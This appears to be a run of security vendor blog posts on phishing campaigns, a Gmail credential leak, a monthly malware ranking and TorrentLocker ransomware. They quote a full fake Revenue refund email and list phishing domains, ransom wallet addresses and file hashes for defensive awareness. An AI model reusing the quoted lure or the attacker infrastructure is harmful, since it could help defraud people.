Italian job? Tax refund scam as Gaeilge in Irish mailboxes

Are we all getting €138.50 back from the taxman? No. But scammers with an Italian link are trying to convince Irish recipients they’re legit by sending a mail as Gaeilge.

ESET Ireland has detected many samples of an email, targeting Irish mailboxes, which has a subject “Tax Refund Application” and reads:

From: Revenue – Irish Tax <xxxxx@revenue.ie>

Revenue – Cin agus Custaim na hireann

Tar is na romhanna bliantil deireanach de do ghnomhaocht fioscach, n mr dinn a chinneadh go bhfuil t i dteideal a fhil ar aisoc cnach de € 138.50 EUR. Cuir do Iarratas Aisoc Cnach ag lonadh an eForm135. Beidh do aisoc a chur chuig do chuntas bainc sa 2-4 seachtaine seo chugainn.

Nta: Is fidir aisocaocht a moill ar chiseanna agsla, mar shampla, a chur isteach taifid neamhbhail n a bhfuil feidhm i ndiaidh an spriocdhta.

_______________________________________________

Revenue – Irish Tax and Customs

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of € 138.50 EUR. Complete your Tax Refund Application by filling the eForm135. Your refund will be sent to your bank account in the next 2-4 weeks.

Note: A refund can be delayed for various reasons, for example submitting invalid records or applying after the deadline.

The email prompts potential victims to fill a form, which, unsurprisingly, leads to a website at http://www.comunespoleto.gov.it, which is an Italian address, then redirects to an Australian-hosted fake website, registered in USA, equipped with all the official markings of Irish Tax and Customs, which asks for personal, bank and card details, which the scammers can then rob.

revenue

(click for full size image)

Any Irish speaker would quickly recognise the translation as a poor Google Translate job, and the scammer’s sloppy copy-paste even removed all the accented characters from the text, which makes it rather useless, but an average unfamiliar user could still be fooled by the fact the mail and forged website are rather official-looking. Phishing mails like this one, using a relatively rare language to address potential victims, show how the cybercriminals are targetting even small countries, just for a chance of profit. The long global path of the scam (Irish targets via Italian link via Australian site with an American site registration) on the other hand shows the complexity of the global business that is cybercrime.

ESET Ireland recommends Irish computer users be on the lookout for scams like this one. Do not reply to the email, do not follow its bad links and never ever give your personal and banking details to such online forms.

by Urban Schrott, IT Security & Cybercrime Analyst, ESET Ireland

Five million Gmail credentials posted online

According to reports that started to appear on Reddit and other forums on September 9, some five million account credentials were published that have a Gmail address as the user name. For example, if you subscribed to a newsletter on the finegardenz.com site using gthumb99@gmail.com as your user name and the password thumbsup then it is is possible this may have been made public. How? Possibly finegardenz.com was hacked at some point in the past.

The site where the data was published referred to itself as Bitcoin Security and the language of the site that published the email addresses with matching passwords is Russian.

Some people who reviewed the data said that in most cases, the passwords were five years old and did not allow access to their accounts. However, apparently some were still current and reports of attempts to use the credentials have been seen. The assumption is that this compromised data is a collection of credentials obtained by phishing campaigns or malware attacks over recent years.

A website called isleaked.com appeared during the day purporting to allow people to check if their Gmail address had been compromised. However, as of right now, it does not appear to be functioning correctly and frankly I would not go there. Instead, you can check your email address at this site — Have I been pwned — which is run by Troy Hunt, a trusted Microsoft MVP.

The Russian site CNews was the first to publish a story about the credentials and connected them to other recent leaks such as the one affecting Yandex, a popular search engine in Russia. Later TheDailyDot published a screenshot of leaked credentials belonging to Spanish, English and Russian speakers.

Representatives from Google and Yandex issued assurances that their systems had not been compromised, but as mentioned above, the keys had been stolen by phishing campaigns and unauthorized access to user accounts (in other words, not leaked by the system for which the credentials were created, but by users of those systems).

Obviously, Gmail account credentials themselves are of great value, given that they provide access to so many Google services, such as Google+ and Google Maps. Access to those two services alone could potentially reveal your home address and allow a stranger to see who your friends are. The lesson here is that if you use a Gmail address as a user name at some site or online service, you should NOT use your Gmail password with that. Remember: different passwords for different sites/services.

For safety’s sake, I just went and changed my Gmail password and I suggest you consider doing the same, even though it is a real pain. I already have two-factor authentication enabled on my Google account and recommend you do this for Google and other accounts that support it. Here is a handy list for some popular services that offer 2FA:

I hope this helps. I also hope we see some arrests of the criminals who keep exposing other people’s private information: doing so is illegal in most countries and a total jerk move wherever you live.

by Stephen Cobb, ESET & Sabrina Pagnotta, ESET LATAM

About life, universe, radio, trojans, cybercrime and everything…

cry

…ok, maybe a bit less about the universe and everything, but definitely about radio, trojans and cybercrime. :)

Yesterday I was again given the opportunity to talk to their listeners about cybersecurity by Community Radio Youghal 104FM. As I have already pointed out in a previous blog ’Listen to the radio’, along with my gratitude for giving me a chance to help their listeners stay safe online, it is very important for people to stay informed about latest threats, so that they may better know how to avoid them.

It is the cybercriminals’ job to keep coming up with new tricks (and new variations of old ones) all the time, in order to keep making money off their victims. According to one of our surveys, one in four Irish has lost money because of cybercrime, with total damages going into hundreds of millions. On the other side, in the IT security business, it is our job to prevent that from happening. A cat and mouse, cops and robbers game, but one in which computer users can actually make a huge difference if they take proper defensive measures.

In yesterday’s radio chat, the most attention was paid to a Trojan, that’s been hitting Irish mailboxes lately, disguised as a purchase order email. As was pointed out, the cybercriminals are using people’s curiosity to get them to install the malware on their own computers, but the scary thing about the Trojan itself is that people won’t even know it’s there. It doesn’t crash or slow down their computer; it just sits there quietly, making their computer completely vulnerable to cybercriminals to remotely control it for whatever nefarious purposes they chose. They could make it into a ‘zombie’, a part of a botnet, used to send spam mail, participate in hacking attacks or for distributing illegal content. All without the owner knowing anything about it, until, possibly, the law enforcement shows up at their door…

So, this is just one of the many types of threats preying on the unwary, there are many new ones being devised by the bad guys as we speak. But the internet is not that unlike the real world. Sure there are dangers and bad people around, but if you act responsibly and are aware of your surroundings, it is a fun and pleasant thing to explore. So rather than imagine the cyber-world as a dangerous place, know its bad sides and avoid them. Want to know ‘how to’? ESET Ireland’s blog’s ‘how to’ selection is a good place to start. Or listen to the radio. ;)

by Urban Schrott, ESET Ireland

Monthly Threat Report: August 2014

Top_10_ELG_ago_14_1200x627eng-01

The Top Ten Threats

 

1. Win32/Bundpil

Previous Ranking: 1

Percentage Detected: 2.18%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains an URL address, and it tries to download several files from the address. The files are then executed and the HTTP protocol is used.  The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

 

2. JS/Kryptik.I

Previous Ranking: 2

Percentage Detected: 1.83%

JS/Kryptik is a generic detection of malicious obfuscated JavaScript code embedded in HTML pages; it usually redirects the browser to a malicious URL or implements a specific exploit.

 

3. Win32/Adware.MultiPlug

Previous Ranking: 7

Percentage Detected: 1.53%

Win32/Adware.Multiplug is a Possible Unwanted Application that once it’s present into the users system might cause applications to displays advertising popup windows during internet browsing.

4. Win32/RiskWare.NetFilter

Previous Ranking: 3

Percentage Detected: 1.46%

Win32/RiskWare.NetFilter is an application that includes malicious code designed to force infeted computers to engage in unwanted behaviour. It allows an attacker to remotely connect to the infected system and control it in order to steal sensitive information or install other malware.

 

5. LNK/Agent.AK

Previous Ranking: 4

Percentage Detected: 1.4%

LNK/Agent.AK is a link that concatenates commands to run the real or legitimate application/folder and, additionaly runs the threat in the background. It could become the new version of the autorun.inf threat. This vulnerability was known as Stuxnet was discovered, as it was one of four that threat vulnerabilities executed.

 

6. Win32/Sality

Previous Ranking: 5

Percentage Detected: 1.38%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature: http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

7. INF/Autorun

Previous Ranking: 8

Percentage Detected: 1.2%

INF/Autorun is generic detection of the AUTORUN.INF configuration file created by malware. The AUTORUN.INF file contains the path to the malware executable. This file is usually dropped into the root folder of available drives in an attempt to autorun a malware executable when the infected drive is mounted. The AUTORUN.INF file(s) may have the System (S) and Hidden (H) attributes present in attempt to hide the file in Windows Explorer

 

8. HTML/ScrInject

Previous Ranking: 6

Percentage Detected: 1.13%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

 

9. Win32/Ramnit

Previous Ranking: n/a

Percentage Detected: 1.1%

It is a File infector that executes on every system start. It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

 

10. Win32/Conficker

Previous Ranking: 9

Percentage Detected: 1.08%

Win32/Conficker is a worm that spreads by exploiting a vulnerability in Server Service. The file is run-time compressed using UPX. When executed, the worm copies itself into the %system% folder using the name %variable%.dll.

The worm starts a HTTP server on a random port and it connects to remote machines to port TCP 445 in attempt to exploit the Server Service vulnerability. If successful, the remote computer attempts to connect to the infected computer and download a copy of the worm.

The worm will attempt to download several files from the Internet, and then they are executed. The worm contains a list of (1) URLs. Windows Firewall is disabled. This vulnerability is described in Microsoft Security Bulletin MS08-067.

UK under attack by ‘Royal Mail’ phishing, carrying TorrentLocker

Three weeks ago, iSIGHT Partners discovered a new Ransomware encrypting victims’ documents. They dubbed this new threat TorrentLocker. TorrentLocker propagates via spam messages containing a link to a phishing page where the user is asked to download and execute “package tracking information”. In August, only Australians were targeted with fake Australian Post package-tracking page.

While tracking this new threat, ESET researchers found the malicious gang is targeting new victims. Internet users from the United Kingdom should be aware that fake Royal Mail package-tracking pages are online and distributing TorrentLocker.

Royal Mail phishing pageRoyal Mail phishing page

The scheme is the same: you type a captcha then click to download a zip file containing the executable payload. It is interesting to note that the fake Royal Mail page will only show if the visitor is from the UK. Filtering seems to be based on the IP address of the request. If the request does not come from a UK IP address, the victim will be redirected to google.com. Three new domains are hosting the fake Royal Mail page:

  • royalmail-tracking.info
  • royalmail-tracking.biz
  • royalmail-tracking.org

royalmail-tracking.info registration informationroyalmail-tracking.info registration information

As you can see, registration date for these domains is September 2nd so this campaign started very recently.

Executable file propertiesExecutable file properties

Encrypted files in users' picturesEncrypted files in users’ pictures

Warning is shown upon execution of the malwareWarning is shown upon execution of the malware

Once installed, victims’ documents are encrypted and they are being asked for a ransom of 350 GBP if paid within 72 hours or 700 GPB otherwise. Payment is done via Bitcoin transaction (1.19 BTC or 2.38 BTC). To hide their infrastructure, the web server is hosted on a .onion host on the Tor network.

To make it is easy for victims to access the web page, TorrentLocker is giving links to Tor2Web nodes so they don’t have to install additional software to reach the .onion website. Interestingly, door2tor.org, the domain name of one of the suggested Tor2Web node, was registered only 2 weeks ago. Perhaps its purpose is only to allow TorrrentLocker’s victims to contact the server selling the decryption software.

"Decryption software" sold on the Tor network“Decryption software” sold on the Tor network

This threat caries the TorrentLocker name because it uses the “Bit Torrent Application” Windows registry key to store its settings. It is unrelated to the BitTorrent protocol.

The Bitcoin trail

Bitcoin transaction detailsBitcoin transaction details

As discovered by iSIGHT Partners, the Australian variant they analyzed asked for Bitcoins to be sent to 15aBFwoT5epvRK69Zyq7Z7HMPS7kvBN8Fg. In our case, the Bitcoin address changed to 13qm2ezhWSHWzMsGcxtKDhKNnchfP5Sp3X. If you look at the transactions on both wallets, the Bitcoins are then transferred to 17gH1u6VJwhVD9cWR59jfeinLMzag2GZ43.

Since March 2014, this Bitcoin wallet has transferred over 82 272 BTC. With 1 BTC currently valued at US$480, the total transactions are roughly equal to 40 millions US$. This wallet has been associated with other scams in the past, including wallet stealing and selling fake mining hardware. We do not know if this account is owner by the TorrentLocker gang or it is some kind of exchange service used by different groups.

Screenshot of a discussion on Hashtalk (now offline, retrieved from Google Cache)Screenshot of a discussion on Hashtalk (now offline, retrieved from Google Cache)

ESET products detect this threat as Win32/Filecoder.NCC or Win32/Injector.

SHA-1 hashes

  • 491C8276667074B502BD98B98C74E4515A32189B (exe)
  • 46A2426D7E062E76D49707B58A5DF28547CBC0F4 (zip)
  • 7C62651C5F4CB1C780C8E9C4692F3BF24208A61E (exe)

References

 

by Marc-Etienne M.Léveillé, ESET

AV-Comparatives Declares: “ESET Cyber Security Pro for Mac Provides Outstanding Protection”

av

ESET Cyber Security Pro achieved excellent results in the latest AV-Comparatives testing of protection for Mac users against Mac-specific and Windows malware.

ESET Cyber Security Pro, the Internet security software for Mac, was highlighted as outstanding by AV-Comparatives’ Mac Security Test and Review 2014. Testing by AV-Comparatives was for the detection of cross-platform malware targeting a wide range of platforms.

The AV-Comparatives test looked, among others, at malware and phishing alerts of Mac security software. With regards to ESET’s product it tested, it found the following:

ESET Cyber Security Pro provides outstanding protection against malware with a well-designed user interface. The main program window makes essential functions and information easily accessible and alerts are sensible. The help facilities are exemplary. ESET produced a perfect score in our malware tests, identifying all samples of both Mac and Windows malware.

We are pleased that ESET Cyber Security Pro scored a perfect 100% in the latest AV-Comparative test. Proven technology found in all ESET’s products povides comprehensive proactive protection against all known and unknown forms of threats targeting Mac users,” adds Ignacio Sbampato, ESET Chief Sales and Marketing Officer.

ESET Cyber Security Pro offers users a number of improved native functionalities together with the low system footprint, delivering Mac-like feel for users. ESET’s solution not only protects Macs it also eliminates Windows and Linux based threats preventing Macs becoming a platform for spreading malware. The new Anti-Phishing module ensures high level of protection as users explore the great online.

The Irish are being emailed a trojan downloader

ESET Ireland finds a trojan downloader in disguised as a purchase order email.

An email with a malicious attachment has been identified by ESET Ireland. The email pretends to be a “purchase order” confirmation email, but has an archive file attached. The email reads:

mail

The receiver of the email is usually alarmed about a “purchase” they never made and want to investigate this, by having a closer look at the “detailed information on your purchase” the email mentions.

The attachment however doesn’t offer any “information”, but instead includes an executable file, which contains a variant of a trojan downloader, which ESET recognises as Win32/TrojanDonloader.Elenoocka. Elenoocka is a trojan which tries to download other malware from the Internet. It contains a list of 6 URLs and attempts to download several files from the addresses. The files can contain Win32/Kryptik.CKEY trojan, from the rather nasty family of Kryptik trojans which create malicious system files that hide deeply inside your operating system, avoiding detection and basically opening your computer for any sort of infections, the cybercriminals want to send your way.

A computer infected by a trojan like this one can be used by cybercriminals as a part of a botnet, without the owner even knowing and used for hacking attacks, distributing illegal content or sending spam.

ESET Ireland advises Irish computer users to avoid opening any unknown attachments to emails, particularly emails like this one, which are designed to play on people’s curiosity.

Although ESET users are protected against this infection, it is always goood to make sure your virus definitions are up to date and your operating system updates are regularly installed.

by Urban Schrott, ESET Ireland

Follow

Get every new post delivered to your Inbox.

Join 72 other followers